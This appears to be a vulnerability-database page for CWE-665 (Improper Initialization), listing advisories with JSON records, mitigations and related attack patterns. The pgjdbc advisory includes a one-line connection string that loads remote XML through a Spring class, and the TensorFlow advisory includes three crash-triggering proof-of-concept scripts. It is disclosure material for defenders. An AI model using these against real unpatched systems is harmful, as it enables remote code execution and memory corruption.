Common Weakness Enumeration

CWE-665

Discouraged

Improper Initialization

Abstraction: Class · Status: Draft

The product does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used.

425 vulnerabilities reference this CWE, most recent first.

GHSA-V7WG-CPWC-24M4

Vulnerability from github – Published: 2022-02-02 00:04 – Updated: 2022-08-12 13:14
VLAI
Summary
pgjdbc Does Not Check Class Instantiation when providing Plugin Classes
Details

Impact

pgjdbc instantiates plugin instances based on class names provided via authenticationPluginClassName, sslhostnameverifier, socketFactory, sslfactory, sslpasswordcallback connection properties.

However, the driver did not verify if the class implements the expected interface before instantiating the class.

Here's an example attack using an out-of-the-box class from Spring Framework:

DriverManager.getConnection("jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://target/exp.xml");

The first impacted version is REL9.4.1208 (it introduced socketFactory connection property)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.postgresql:postgresql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.4.1208"
            },
            {
              "fixed": "42.2.25"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.postgresql:postgresql"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "42.3.0"
            },
            {
              "fixed": "42.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-21724"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665",
      "CWE-668",
      "CWE-74"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-02-01T22:40:00Z",
    "nvd_published_at": "2022-02-02T12:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\npgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties.\n\nHowever, the driver did not verify if the class implements the expected interface before instantiating the class.\n\nHere\u0027s an example attack using an out-of-the-box class from Spring Framework:\n\n```\nDriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext\u0026socketFactoryArg=http://target/exp.xml\");\n```\n\nThe first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property)",
  "id": "GHSA-v7wg-cpwc-24m4",
  "modified": "2022-08-12T13:14:09Z",
  "published": "2022-02-02T00:04:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21724"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pgjdbc/pgjdbc"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220311-0005"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2022/dsa-5196"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pgjdbc Does Not Check Class Instantiation when providing Plugin Classes"
}

GHSA-V8C4-4GHF-7JV6

Vulnerability from github – Published: 2024-08-13 18:31 – Updated: 2024-08-13 18:31
VLAI
Details

Improper re-initialization of IOMMU during the DRTM event may permit an untrusted platform configuration to persist, allowing an attacker to read or modify hypervisor memory, potentially resulting in loss of confidentiality, integrity, and availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-20591"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-13T17:15:19Z",
    "severity": "MODERATE"
  },
  "details": "Improper re-initialization of IOMMU during the DRTM event\nmay permit an untrusted platform configuration to persist, allowing an attacker\nto read or modify hypervisor memory, potentially resulting in loss of\nconfidentiality, integrity, and availability.",
  "id": "GHSA-v8c4-4ghf-7jv6",
  "modified": "2024-08-13T18:31:15Z",
  "published": "2024-08-13T18:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20591"
    },
    {
      "type": "WEB",
      "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3003.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VCMR-24JV-7V64

Vulnerability from github – Published: 2022-08-19 00:00 – Updated: 2022-08-25 00:00
VLAI
Details

Improper initialization in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable an escalation of privilege via local access.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-27493"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-08-18T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper initialization in the firmware for some Intel(R) NUC Laptop Kits before version BC0076 may allow a privileged user to potentially enable an escalation of privilege via local access.",
  "id": "GHSA-vcmr-24jv-7v64",
  "modified": "2022-08-25T00:00:26Z",
  "published": "2022-08-19T00:00:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27493"
    },
    {
      "type": "WEB",
      "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00712.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VF42-37CV-443P

Vulnerability from github – Published: 2023-10-04 06:30 – Updated: 2023-11-24 09:30
VLAI
Details

On CPU 0 the check for the SMCCC workaround is called before SMCCC support has been initialized. This resulted in no speculative execution workarounds being installed on CPU 0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-5370"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-10-04T04:15:15Z",
    "severity": "MODERATE"
  },
  "details": "On CPU 0 the check for the SMCCC workaround is called before SMCCC support has been initialized. This resulted in no speculative execution workarounds being installed on CPU 0.",
  "id": "GHSA-vf42-37cv-443p",
  "modified": "2023-11-24T09:30:27Z",
  "published": "2023-10-04T06:30:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5370"
    },
    {
      "type": "WEB",
      "url": "https://security.FreeBSD.org/advisories/FreeBSD-SA-23:14.smccc.asc"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20231124-0005"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VG94-PG3X-HQQ7

Vulnerability from github – Published: 2022-05-13 01:18 – Updated: 2022-05-13 01:18
VLAI
Details

The Windows kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an information disclosure vulnerability due to the way objects are initialized in memory, aka "Windows Kernel Information Disclosure Vulnerability". This CVE is unique from CVE-2018-0811, CVE-2018-0814, CVE-2018-0894, CVE-2018-0895, CVE-2018-0896, CVE-2018-0897, CVE-2018-0898, CVE-2018-0899, CVE-2018-0900, and CVE-2018-0901 and CVE-2018-0926.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0813"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-03-14T17:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The Windows kernel in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, and 1709, Windows Server 2016 and Windows Server, version 1709 allows an information disclosure vulnerability due to the way objects are initialized in memory, aka \"Windows Kernel Information Disclosure Vulnerability\". This CVE is unique from CVE-2018-0811, CVE-2018-0814, CVE-2018-0894, CVE-2018-0895, CVE-2018-0896, CVE-2018-0897, CVE-2018-0898, CVE-2018-0899, CVE-2018-0900, and CVE-2018-0901 and CVE-2018-0926.",
  "id": "GHSA-vg94-pg3x-hqq7",
  "modified": "2022-05-13T01:18:31Z",
  "published": "2022-05-13T01:18:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0813"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0813"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/103250"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1040517"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VGV8-JXQV-MHH6

Vulnerability from github – Published: 2022-05-13 01:22 – Updated: 2022-05-13 01:22
VLAI
Details

A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 12.1.3, macOS Mojave 10.14.3, tvOS 12.1.2. A malicious application may cause unexpected changes in memory shared between processes.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-6208"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-05T16:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 12.1.3, macOS Mojave 10.14.3, tvOS 12.1.2. A malicious application may cause unexpected changes in memory shared between processes.",
  "id": "GHSA-vgv8-jxqv-mhh6",
  "modified": "2022-05-13T01:22:37Z",
  "published": "2022-05-13T01:22:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-6208"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT209443"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT209446"
    },
    {
      "type": "WEB",
      "url": "https://support.apple.com/HT209447"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/46296"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/106695"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJ57-VWP3-5MFP

Vulnerability from github – Published: 2022-05-13 01:18 – Updated: 2022-05-13 01:18
VLAI
Details

The Windows kernel in Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows an information disclosure vulnerability due to the way memory addresses are handled, aka "Windows Information Disclosure Vulnerability". This CVE ID is unique from CVE-2018-0745 and CVE-2018-0747.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-0746"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-01-04T14:29:00Z",
    "severity": "MODERATE"
  },
  "details": "The Windows kernel in Windows 8.1 and RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allows an information disclosure vulnerability due to the way memory addresses are handled, aka \"Windows Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2018-0745 and CVE-2018-0747.",
  "id": "GHSA-vj57-vwp3-5mfp",
  "modified": "2022-05-13T01:18:25Z",
  "published": "2022-05-13T01:18:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-0746"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0746"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/43471"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/102365"
    },
    {
      "type": "WEB",
      "url": "http://www.securitytracker.com/id/1040097"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VVG4-VGRV-XFR7

Vulnerability from github – Published: 2021-05-21 14:28 – Updated: 2024-11-13 16:25
VLAI
Summary
Incomplete validation in `tf.raw_ops.CTCLoss`
Details

Impact

Incomplete validation in tf.raw_ops.CTCLoss allows an attacker to trigger an OOB read from heap:

import tensorflow as tf

inputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)
labels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)
labels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)
sequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)

tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
                   labels_values=labels_values, sequence_length=sequence_length,
                   preprocess_collapse_repeated=True, ctc_merge_repeated=False,
                   ignore_longer_outputs_than_inputs=True)

An attacker can also trigger a heap buffer overflow:

import tensorflow as tf

inputs = tf.constant([], shape=[7, 2, 0], dtype=tf.float32)
labels_indices = tf.constant([-100, -100], shape=[2, 1], dtype=tf.int64)
labels_values = tf.constant([-100, -100], shape=[2], dtype=tf.int32)
sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)

tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
                   labels_values=labels_values, sequence_length=sequence_length,
                   preprocess_collapse_repeated=False, ctc_merge_repeated=False,
                   ignore_longer_outputs_than_inputs=False)

Finally, an attacker can trigger a null pointer dereference:

import tensorflow as tf

inputs = tf.constant([], shape=[0, 2, 11], dtype=tf.float32)
labels_indices = tf.constant([], shape=[0, 2], dtype=tf.int64)
labels_values = tf.constant([], shape=[0], dtype=tf.int32)
sequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)

tf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,
                   labels_values=labels_values, sequence_length=sequence_length,
                   preprocess_collapse_repeated=False, ctc_merge_repeated=False,
                   ignore_longer_outputs_than_inputs=False)

Patches

We have patched the issue in GitHub commit14607c0707040d775e06b6817325640cb4b5864c followed by GitHub commit 4504a081af71514bb1828048363e6540f797005b.

The fix will be included in TensorFlow 2.5.0. We will also cherrypick these commits on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-cpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.1.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.2.0"
            },
            {
              "fixed": "2.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.3.0"
            },
            {
              "fixed": "2.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "tensorflow-gpu"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-29613"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-125",
      "CWE-665"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-17T21:46:09Z",
    "nvd_published_at": "2021-05-14T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact \nIncomplete validation in `tf.raw_ops.CTCLoss` allows an attacker to trigger an OOB read from heap:\n\n```python\nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[10, 16, 0], dtype=tf.float32)\nlabels_indices = tf.constant([], shape=[8, 0], dtype=tf.int64)\nlabels_values = tf.constant([-100] * 8, shape=[8], dtype=tf.int32)\nsequence_length = tf.constant([-100] * 16, shape=[16], dtype=tf.int32)\n  \ntf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,\n                   labels_values=labels_values, sequence_length=sequence_length,\n                   preprocess_collapse_repeated=True, ctc_merge_repeated=False,\n                   ignore_longer_outputs_than_inputs=True)\n```   \n      \nAn attacker can also trigger a heap buffer overflow:\n\n```python\nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[7, 2, 0], dtype=tf.float32)\nlabels_indices = tf.constant([-100, -100], shape=[2, 1], dtype=tf.int64)\nlabels_values = tf.constant([-100, -100], shape=[2], dtype=tf.int32)\nsequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)\n\ntf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,\n                   labels_values=labels_values, sequence_length=sequence_length,\n                   preprocess_collapse_repeated=False, ctc_merge_repeated=False,\n                   ignore_longer_outputs_than_inputs=False)\n```\n\nFinally, an attacker can trigger a null pointer dereference:\n\n```python \nimport tensorflow as tf\n\ninputs = tf.constant([], shape=[0, 2, 11], dtype=tf.float32)\nlabels_indices = tf.constant([], shape=[0, 2], dtype=tf.int64)\nlabels_values = tf.constant([], shape=[0], dtype=tf.int32)\nsequence_length = tf.constant([-100, -100], shape=[2], dtype=tf.int32)\n\ntf.raw_ops.CTCLoss(inputs=inputs, labels_indices=labels_indices,\n                   labels_values=labels_values, sequence_length=sequence_length,\n                   preprocess_collapse_repeated=False, ctc_merge_repeated=False,\n                   ignore_longer_outputs_than_inputs=False)\n```\n\n### Patches\nWe have patched the issue in GitHub commit[14607c0707040d775e06b6817325640cb4b5864c](https://github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c) followed by GitHub commit [4504a081af71514bb1828048363e6540f797005b](https://github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b).\n\nThe fix will be included in TensorFlow 2.5.0. We will also cherrypick these commits on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.",
  "id": "GHSA-vvg4-vgrv-xfr7",
  "modified": "2024-11-13T16:25:42Z",
  "published": "2021-05-21T14:28:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vvg4-vgrv-xfr7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29613"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/commit/14607c0707040d775e06b6817325640cb4b5864c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/tensorflow/tensorflow/commit/4504a081af71514bb1828048363e6540f797005b"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-541.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-739.yaml"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-250.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/tensorflow/tensorflow"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Incomplete validation in `tf.raw_ops.CTCLoss`"
}

GHSA-VXGQ-8R56-C922

Vulnerability from github – Published: 2022-05-24 19:01 – Updated: 2022-05-24 19:01
VLAI
Details

Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-28019"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-05-06T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "Exim 4 before 4.94.2 has Improper Initialization that can lead to recursion-based stack consumption or other consequences. This occurs because use of certain getc functions is mishandled when a client uses BDAT instead of DATA.",
  "id": "GHSA-vxgq-8r56-c922",
  "modified": "2022-05-24T19:01:38Z",
  "published": "2022-05-24T19:01:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28019"
    },
    {
      "type": "WEB",
      "url": "https://www.exim.org/static/doc/security/CVE-2020-qualys/CVE-2020-28019-BDATA.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-W34X-X7HQ-C65H

Vulnerability from github – Published: 2022-05-24 17:48 – Updated: 2022-05-24 17:48
VLAI
Details

Due to an improper Initialization vulnerability on Juniper Networks Junos OS QFX5100-96S devices with QFX 5e Series image installed, ddos-protection configuration changes will not take effect beyond the default DDoS (Distributed Denial of Service) settings when configured from the CLI. The DDoS protection (jddosd) daemon allows the device to continue to function while protecting the packet forwarding engine (PFE) during the DDoS attack. When this issue occurs, the default DDoS settings within the PFE apply, as CPU bound packets will be throttled and dropped in the PFE when the limits are exceeded. To check if the device has this issue, the administrator can execute the following command to monitor the status of DDoS protection: user@device> show ddos-protection protocols error: the ddos-protection subsystem is not running This issue affects only QFX5100-96S devices. No other products or platforms are affected by this issue. This issue affects: Juniper Networks Junos OS on QFX5100-96S: 17.3 versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R3, 19.1R3-S4; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2;

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-0234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-665"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-04-22T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Due to an improper Initialization vulnerability on Juniper Networks Junos OS QFX5100-96S devices with QFX 5e Series image installed, ddos-protection configuration changes will not take effect beyond the default DDoS (Distributed Denial of Service) settings when configured from the CLI. The DDoS protection (jddosd) daemon allows the device to continue to function while protecting the packet forwarding engine (PFE) during the DDoS attack. When this issue occurs, the default DDoS settings within the PFE apply, as CPU bound packets will be throttled and dropped in the PFE when the limits are exceeded. To check if the device has this issue, the administrator can execute the following command to monitor the status of DDoS protection: user@device\u003e show ddos-protection protocols error: the ddos-protection subsystem is not running This issue affects only QFX5100-96S devices. No other products or platforms are affected by this issue. This issue affects: Juniper Networks Junos OS on QFX5100-96S: 17.3 versions prior to 17.3R3-S10; 17.4 versions prior to 17.4R3-S4; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R3, 19.1R3-S4; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2;",
  "id": "GHSA-w34x-x7hq-c65h",
  "modified": "2022-05-24T17:48:11Z",
  "published": "2022-05-24T17:48:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-0234"
    },
    {
      "type": "WEB",
      "url": "https://kb.juniper.net/JSA11129"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

Mitigation MIT-3
Requirements

Strategy: Language Selection

  • Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, in Java, if the programmer does not explicitly initialize a variable, then the code could produce a compile-time error (if the variable is local) or automatically initialize the variable to the default value for the variable's type. In Perl, if explicit initialization is not performed, then a default value of undef is assigned, which is interpreted as 0, false, or an equivalent value depending on the context in which the variable is accessed.
Mitigation
Architecture and Design

Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values.

Mitigation
Implementation

Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage.

Mitigation
Implementation

Pay close attention to complex conditionals that affect initialization, since some conditions might not perform the initialization.

Mitigation
Implementation

Avoid race conditions (CWE-362) during initialization routines.

Mitigation
Build and Compilation

Run or compile your product with settings that generate warnings about uninitialized variables or data.

CAPEC-26: Leveraging Race Conditions

The adversary targets a race condition occurring when multiple processes access and manipulate the same resource concurrently, and the outcome of the execution depends on the particular order in which the access takes place. The adversary can leverage a race condition by "running the race", modifying the resource and modifying the normal execution flow. For instance, a race condition can occur while accessing a file: the adversary can trick the system by replacing the original file with their version and cause the system to read the malicious file.

CAPEC-29: Leveraging Time-of-Check and Time-of-Use (TOCTOU) Race Conditions

This attack targets a race condition occurring between the time of check (state) for a resource and the time of use of a resource. A typical example is file access. The adversary can leverage a file access race condition by "running the race", meaning that they would modify the resource between the first time the target program accesses the file and the time the target program uses the file. During that period of time, the adversary could replace or modify the file, causing the application to behave unexpectedly.